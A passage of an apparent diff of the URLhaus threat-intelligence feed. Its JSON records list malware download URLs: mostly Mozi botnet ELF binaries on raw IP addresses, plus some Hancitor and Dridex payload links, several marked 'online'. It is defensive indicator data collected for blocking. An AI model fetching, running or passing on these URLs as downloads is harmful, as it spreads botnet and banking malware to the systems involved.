UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961243","urlhaus_reference":"https://urlhaus.abuse.ch/url/961243/","url":"http://89.160.20.156:44219/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961242","urlhaus_reference":"https://urlhaus.abuse.ch/url/961242/","url":"http://89.160.20.156:36619/bin.sh","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:01:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
+{"id":"961241","urlhaus_reference":"https://urlhaus.abuse.ch/url/961241/","url":"http://89.160.20.156:59976/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:56:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]}
+{"id":"961239","urlhaus_reference":"https://urlhaus.abuse.ch/url/961239/","url":"http://89.160.20.156:48688/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:51:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961240","urlhaus_reference":"https://urlhaus.abuse.ch/url/961240/","url":"http://89.160.20.156:45682/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:51:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961238","urlhaus_reference":"https://urlhaus.abuse.ch/url/961238/","url":"http://89.160.20.156:34922/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961233","urlhaus_reference":"https://urlhaus.abuse.ch/url/961233/","url":"http://89.160.20.156:37489/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961234","urlhaus_reference":"https://urlhaus.abuse.ch/url/961234/","url":"http://89.160.20.156:51940/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961235","urlhaus_reference":"https://urlhaus.abuse.ch/url/961235/","url":"http://89.160.20.156:49599/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961236","urlhaus_reference":"https://urlhaus.abuse.ch/url/961236/","url":"http://89.160.20.156:53436/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961237","urlhaus_reference":"https://urlhaus.abuse.ch/url/961237/","url":"http://89.160.20.156:57237/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:51:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961232","urlhaus_reference":"https://urlhaus.abuse.ch/url/961232/","url":"http://89.160.20.156:50907/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961231","urlhaus_reference":"https://urlhaus.abuse.ch/url/961231/","url":"http://89.160.20.156:41910/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961229","urlhaus_reference":"https://urlhaus.abuse.ch/url/961229/","url":"http://89.160.20.156:57217/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961230","urlhaus_reference":"https://urlhaus.abuse.ch/url/961230/","url":"http://89.160.20.156:47632/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961227","urlhaus_reference":"https://urlhaus.abuse.ch/url/961227/","url":"http://89.160.20.156:46654/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961228","urlhaus_reference":"https://urlhaus.abuse.ch/url/961228/","url":"http://89.160.20.156:59073/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961221","urlhaus_reference":"https://urlhaus.abuse.ch/url/961221/","url":"http://89.160.20.156:37958/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961222","urlhaus_reference":"https://urlhaus.abuse.ch/url/961222/","url":"http://89.160.20.156:53943/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961223","urlhaus_reference":"https://urlhaus.abuse.ch/url/961223/","url":"http://89.160.20.156:40404/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961224","urlhaus_reference":"https://urlhaus.abuse.ch/url/961224/","url":"http://89.160.20.156:46738/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961225","urlhaus_reference":"https://urlhaus.abuse.ch/url/961225/","url":"http://89.160.20.156:58234/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961226","urlhaus_reference":"https://urlhaus.abuse.ch/url/961226/","url":"http://89.160.20.156:36911/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961220","urlhaus_reference":"https://urlhaus.abuse.ch/url/961220/","url":"http://89.160.20.156:35028/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
 {"id":"961219","urlhaus_reference":"https://urlhaus.abuse.ch/url/961219/","url":"http://allanabolicsteam.net/nedfr_.exe","url_status":"offline","host":"allanabolicsteam.net","date_added":"2021-01-14 18:47:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"Myrtus0x0","larted":"true","tags":["c2","hancitor","payload"]}
 {"id":"961217","urlhaus_reference":"https://urlhaus.abuse.ch/url/961217/","url":"https://intranetstc.micromart.com.br/fined.php","url_status":"offline","host":"intranetstc.micromart.com.br","date_added":"2021-01-14 18:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"0x49736b","larted":"false","tags":["Dridex"]}
 {"id":"961218","urlhaus_reference":"https://urlhaus.abuse.ch/url/961218/","url":"http://allanabolicsteam.net/1301s.bin","url_status":"online","host":"allanabolicsteam.net","date_added":"2021-01-14 18:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not 
listed"},"reporter":"Myrtus0x0","larted":"true","tags":["c2","hancitor","payload"]} -{"id":"961216","urlhaus_reference":"https://urlhaus.abuse.ch/url/961216/","url":"http://61.53.222.100:43741/i","url_status":"online","host":"61.53.222.100","date_added":"2021-01-14 18:44:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961215","urlhaus_reference":"https://urlhaus.abuse.ch/url/961215/","url":"http://42.225.52.44:45803/bin.sh","url_status":"offline","host":"42.225.52.44","date_added":"2021-01-14 18:41:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"false","tags":["32-bit","elf","mips"]} -{"id":"961214","urlhaus_reference":"https://urlhaus.abuse.ch/url/961214/","url":"http://191.242.38.33:38611/Mozi.m","url_status":"offline","host":"191.242.38.33","date_added":"2021-01-14 18:36:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} -{"id":"961213","urlhaus_reference":"https://urlhaus.abuse.ch/url/961213/","url":"http://59.97.171.225:35185/Mozi.m","url_status":"offline","host":"59.97.171.225","date_added":"2021-01-14 18:36:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961212","urlhaus_reference":"https://urlhaus.abuse.ch/url/961212/","url":"http://189.51.102.115:35054/Mozi.m","url_status":"offline","host":"189.51.102.115","date_added":"2021-01-14 18:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961207","urlhaus_reference":"https://urlhaus.abuse.ch/url/961207/","url":"http://42.235.186.115:60038/Mozi.m","url_status":"online","host":"42.235.186.115","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961208","urlhaus_reference":"https://urlhaus.abuse.ch/url/961208/","url":"http://219.157.134.199:52253/Mozi.m","url_status":"online","host":"219.157.134.199","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961209","urlhaus_reference":"https://urlhaus.abuse.ch/url/961209/","url":"http://221.14.21.135:43125/Mozi.m","url_status":"online","host":"221.14.21.135","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961210","urlhaus_reference":"https://urlhaus.abuse.ch/url/961210/","url":"http://58.248.118.230:52650/Mozi.a","url_status":"online","host":"58.248.118.230","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961211","urlhaus_reference":"https://urlhaus.abuse.ch/url/961211/","url":"http://219.155.30.125:59273/Mozi.m","url_status":"online","host":"219.155.30.125","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961206","urlhaus_reference":"https://urlhaus.abuse.ch/url/961206/","url":"http://121.159.74.78:40346/Mozi.m","url_status":"online","host":"121.159.74.78","date_added":"2021-01-14 18:35:08 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961204","urlhaus_reference":"https://urlhaus.abuse.ch/url/961204/","url":"http://179.227.77.63:44242/Mozi.m","url_status":"offline","host":"179.227.77.63","date_added":"2021-01-14 18:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961205","urlhaus_reference":"https://urlhaus.abuse.ch/url/961205/","url":"http://117.194.167.179:40624/Mozi.m","url_status":"offline","host":"117.194.167.179","date_added":"2021-01-14 18:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961202","urlhaus_reference":"https://urlhaus.abuse.ch/url/961202/","url":"http://123.9.103.67:41245/Mozi.m","url_status":"online","host":"123.9.103.67","date_added":"2021-01-14 18:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961203","urlhaus_reference":"https://urlhaus.abuse.ch/url/961203/","url":"http://182.116.67.218:48866/Mozi.m","url_status":"online","host":"182.116.67.218","date_added":"2021-01-14 18:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961198","urlhaus_reference":"https://urlhaus.abuse.ch/url/961198/","url":"http://125.41.142.109:58258/Mozi.m","url_status":"online","host":"125.41.142.109","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961199","urlhaus_reference":"https://urlhaus.abuse.ch/url/961199/","url":"http://123.9.243.249:34516/Mozi.m","url_status":"online","host":"123.9.243.249","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961200","urlhaus_reference":"https://urlhaus.abuse.ch/url/961200/","url":"http://120.85.171.199:47851/Mozi.m","url_status":"online","host":"120.85.171.199","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961201","urlhaus_reference":"https://urlhaus.abuse.ch/url/961201/","url":"http://186.33.122.79:49226/Mozi.m","url_status":"online","host":"186.33.122.79","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961197","urlhaus_reference":"https://urlhaus.abuse.ch/url/961197/","url":"http://103.97.139.251:36957/bin.sh","url_status":"online","host":"103.97.139.251","date_added":"2021-01-14 18:34:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961196","urlhaus_reference":"https://urlhaus.abuse.ch/url/961196/","url":"http://115.54.114.20:53089/Mozi.m","url_status":"online","host":"115.54.114.20","date_added":"2021-01-14 18:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961193","urlhaus_reference":"https://urlhaus.abuse.ch/url/961193/","url":"http://103.161.49.76:57114/Mozi.m","url_status":"online","host":"103.161.49.76","date_added":"2021-01-14 18:34:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961194","urlhaus_reference":"https://urlhaus.abuse.ch/url/961194/","url":"http://115.56.159.83:33163/Mozi.a","url_status":"online","host":"115.56.159.83","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961195","urlhaus_reference":"https://urlhaus.abuse.ch/url/961195/","url":"http://115.56.181.246:48557/Mozi.m","url_status":"online","host":"115.56.181.246","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961192","urlhaus_reference":"https://urlhaus.abuse.ch/url/961192/","url":"http://115.58.166.75:59976/bin.sh","url_status":"online","host":"115.58.166.75","date_added":"2021-01-14 18:31:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961191","urlhaus_reference":"https://urlhaus.abuse.ch/url/961191/","url":"http://125.44.61.35:48291/i","url_status":"online","host":"125.44.61.35","date_added":"2021-01-14 18:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961190","urlhaus_reference":"https://urlhaus.abuse.ch/url/961190/","url":"http://42.230.84.239:45797/Mozi.m","url_status":"online","host":"42.230.84.239","date_added":"2021-01-14 18:21:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961186","urlhaus_reference":"https://urlhaus.abuse.ch/url/961186/","url":"http://61.53.222.100:43741/bin.sh","url_status":"online","host":"61.53.222.100","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961187","urlhaus_reference":"https://urlhaus.abuse.ch/url/961187/","url":"http://59.93.21.58:35446/Mozi.a","url_status":"offline","host":"59.93.21.58","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961188","urlhaus_reference":"https://urlhaus.abuse.ch/url/961188/","url":"http://59.88.231.198:35720/Mozi.m","url_status":"online","host":"59.88.231.198","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961189","urlhaus_reference":"https://urlhaus.abuse.ch/url/961189/","url":"http://59.96.37.115:50501/Mozi.m","url_status":"offline","host":"59.96.37.115","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961185","urlhaus_reference":"https://urlhaus.abuse.ch/url/961185/","url":"http://119.118.75.183:55796/Mozi.m","url_status":"online","host":"119.118.75.183","date_added":"2021-01-14 18:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961183","urlhaus_reference":"https://urlhaus.abuse.ch/url/961183/","url":"http://175.206.182.103:52308/Mozi.m","url_status":"online","host":"175.206.182.103","date_added":"2021-01-14 18:20:07 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961184","urlhaus_reference":"https://urlhaus.abuse.ch/url/961184/","url":"http://117.222.162.104:59154/Mozi.m","url_status":"offline","host":"117.222.162.104","date_added":"2021-01-14 18:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961177","urlhaus_reference":"https://urlhaus.abuse.ch/url/961177/","url":"http://122.188.192.87:57950/Mozi.m","url_status":"online","host":"122.188.192.87","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961178","urlhaus_reference":"https://urlhaus.abuse.ch/url/961178/","url":"http://222.141.8.40:33520/Mozi.m","url_status":"online","host":"222.141.8.40","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961179","urlhaus_reference":"https://urlhaus.abuse.ch/url/961179/","url":"http://123.14.202.127:45525/Mozi.m","url_status":"online","host":"123.14.202.127","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961180","urlhaus_reference":"https://urlhaus.abuse.ch/url/961180/","url":"http://41.86.21.38:38430/Mozi.m","url_status":"online","host":"41.86.21.38","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961181","urlhaus_reference":"https://urlhaus.abuse.ch/url/961181/","url":"http://220.125.119.207:4096/Mozi.m","url_status":"online","host":"220.125.119.207","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961182","urlhaus_reference":"https://urlhaus.abuse.ch/url/961182/","url":"http://121.150.209.136:50631/Mozi.a","url_status":"online","host":"121.150.209.136","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961176","urlhaus_reference":"https://urlhaus.abuse.ch/url/961176/","url":"http://186.33.122.85:37989/Mozi.m","url_status":"online","host":"186.33.122.85","date_added":"2021-01-14 18:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961175","urlhaus_reference":"https://urlhaus.abuse.ch/url/961175/","url":"http://219.157.253.54:54078/Mozi.m","url_status":"online","host":"219.157.253.54","date_added":"2021-01-14 18:20:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961173","urlhaus_reference":"https://urlhaus.abuse.ch/url/961173/","url":"http://219.154.108.170:34201/i","url_status":"online","host":"219.154.108.170","date_added":"2021-01-14 18:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961174","urlhaus_reference":"https://urlhaus.abuse.ch/url/961174/","url":"http://115.59.119.91:56573/Mozi.m","url_status":"online","host":"115.59.119.91","date_added":"2021-01-14 18:19:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961172","urlhaus_reference":"https://urlhaus.abuse.ch/url/961172/","url":"http://125.44.61.35:48291/bin.sh","url_status":"online","host":"125.44.61.35","date_added":"2021-01-14 18:08:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961170","urlhaus_reference":"https://urlhaus.abuse.ch/url/961170/","url":"http://59.92.217.195:60102/Mozi.m","url_status":"online","host":"59.92.217.195","date_added":"2021-01-14 18:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961171","urlhaus_reference":"https://urlhaus.abuse.ch/url/961171/","url":"http://59.92.183.181:52225/Mozi.m","url_status":"offline","host":"59.92.183.181","date_added":"2021-01-14 18:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961167","urlhaus_reference":"https://urlhaus.abuse.ch/url/961167/","url":"http://59.99.95.7:56733/Mozi.m","url_status":"offline","host":"59.99.95.7","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961168","urlhaus_reference":"https://urlhaus.abuse.ch/url/961168/","url":"http://58.249.82.105:57042/Mozi.m","url_status":"online","host":"58.249.82.105","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961169","urlhaus_reference":"https://urlhaus.abuse.ch/url/961169/","url":"http://59.99.188.73:38035/Mozi.m","url_status":"offline","host":"59.99.188.73","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961165","urlhaus_reference":"https://urlhaus.abuse.ch/url/961165/","url":"http://42.228.238.118:33540/Mozi.m","url_status":"online","host":"42.228.238.118","date_added":"2021-01-14 18:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961166","urlhaus_reference":"https://urlhaus.abuse.ch/url/961166/","url":"http://42.238.236.187:51947/Mozi.m","url_status":"online","host":"42.238.236.187","date_added":"2021-01-14 18:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961164","urlhaus_reference":"https://urlhaus.abuse.ch/url/961164/","url":"http://186.33.123.28:36915/Mozi.m","url_status":"online","host":"186.33.123.28","date_added":"2021-01-14 18:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961163","urlhaus_reference":"https://urlhaus.abuse.ch/url/961163/","url":"http://182.116.84.95:38865/Mozi.m","url_status":"online","host":"182.116.84.95","date_added":"2021-01-14 18:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961162","urlhaus_reference":"https://urlhaus.abuse.ch/url/961162/","url":"http://103.217.123.186:55480/Mozi.m","url_status":"offline","host":"103.217.123.186","date_added":"2021-01-14 18:04:37 
